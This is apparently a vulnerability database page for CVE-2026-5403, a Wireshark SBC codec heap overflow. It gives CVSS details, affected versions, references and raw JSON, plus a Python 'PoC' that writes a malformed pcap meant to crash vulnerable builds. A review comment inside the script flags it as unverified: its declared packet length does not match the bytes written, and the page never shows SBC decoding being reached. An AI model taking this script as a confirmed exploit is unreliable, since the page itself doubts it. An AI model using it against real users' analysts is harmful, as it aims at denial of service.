Security Vulnerability Report
CVE-2026-5403 CVSS 7.8 HIGH

CVE-2026-5403

Published: 2026-05-01 00:16:25
Last Modified: 2026-05-01 19:18:05

Description

SBC codec crash in Wireshark 4.6.0 to 4.6.4 and 4.4.0 to 4.4.14 allows denial of service and possible code execution

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:wireshark:wireshark:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:wireshark:wireshark:*:*:*:*:*:*:*:* - VULNERABLE
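Wireshark 4.4.0 - 4.4.14 (the raw JSON below gives versionEndExcluding 4.4.15 for this range)
Wireshark 4.6.0 - 4.6.4 (the raw JSON below gives versionEndExcluding 4.6.5 for this range)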

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import struct

# Builds a one-record classic pcap file: a global header, one record header,
# dummy Ethernet/IPv4/UDP headers and a filler payload.
#
# NOTE(review): treat this as an unverified sample, not a confirmed reproducer
# for CVE-2026-5403. The record header declares 1000 captured bytes while the
# sections written after it total well under that, and nothing on this page
# shows that the payload is ever handed to SBC decoding. A build that does not
# crash on this file is therefore not evidence that it is patched; check the
# installed version against the affected ranges (4.4.0-4.4.14, 4.6.0-4.6.4)
# and the vendor advisory instead.


def generate_malformed_pcap(filename):
    """Write the sample capture to *filename*.

    The file is opened in binary write mode, so an existing file at that
    path is overwritten. Two status lines are printed once the file has
    been written. Returns None.
    """
    # Classic pcap global header, packed little-endian.
    file_header = struct.pack(
        '<IHHIIII',
        0xa1b2c3d4,  # magic number
        2,           # version major
        4,           # version minor
        0,           # thiszone
        0,           # sigfigs
        65535,       # snaplen
        1,           # network (Ethernet)
    )

    # Per-record header: ts_sec, ts_usec, incl_len, orig_len.
    # Both length fields carry the same fixed value of 1000.
    declared_len = 1000
    record_header = struct.pack('<IIII', 0, 0, declared_len, declared_len)

    # Placeholder link/network/transport headers, copied as fixed bytes.
    ethernet = b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00'
    ipv4 = b'\x45\x00\x00\x1c\x00\x00\x40\x00\x40\x11\x00\x00\x7f\x00\x00\x01\x7f\x00\x00\x01'
    udp = b'\x00\x00\x00\x00\x00\x08\x00\x00'

    # One 0x9C byte (the value SBC frames use as a syncword) followed by
    # 500 bytes of 'A' filler; there is no further frame structure.
    filler = b'\x9C' + b'A' * 500

    sections = (file_header, record_header, ethernet, ipv4, udp, filler)
    with open(filename, 'wb') as out:
        for section in sections:
            out.write(section)

    print(f"[+] Malformed PCAP file generated: {filename}")
    print("[+] Open this file in the vulnerable Wireshark version to trigger the crash.")


if __name__ == "__main__":
    generate_malformed_pcap("crash_sbc.pcap")

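References

https://gitlab.com/wireshark/wireshark/-/issues/21103 (tagged Exploit, Issue Tracking, Third Party Advisory)
https://www.wireshark.org/security/wnpa-sec-2026-16.html (tagged Vendor Advisory)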

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-5403", "sourceIdentifier": "[email protected]", "published": "2026-05-01T00:16:24.670", "lastModified": "2026-05-01T19:18:04.737", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SBC codec crash in Wireshark 4.6.0 to 4.6.4 and 4.4.0 to 4.4.14 allows denial of service and possible code execution"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-122"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wireshark:wireshark:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.4.0", "versionEndExcluding": "4.4.15", "matchCriteriaId": "8EAFFA8A-B5D8-4784-851E-E1B682871495"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wireshark:wireshark:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.6.0", "versionEndExcluding": "4.6.5", "matchCriteriaId": "1D804272-AD4D-4454-9629-1BBAA825D7C4"}]}]}], "references": [{"url": "https://gitlab.com/wireshark/wireshark/-/issues/21103", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://www.wireshark.org/security/wnpa-sec-2026-16.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}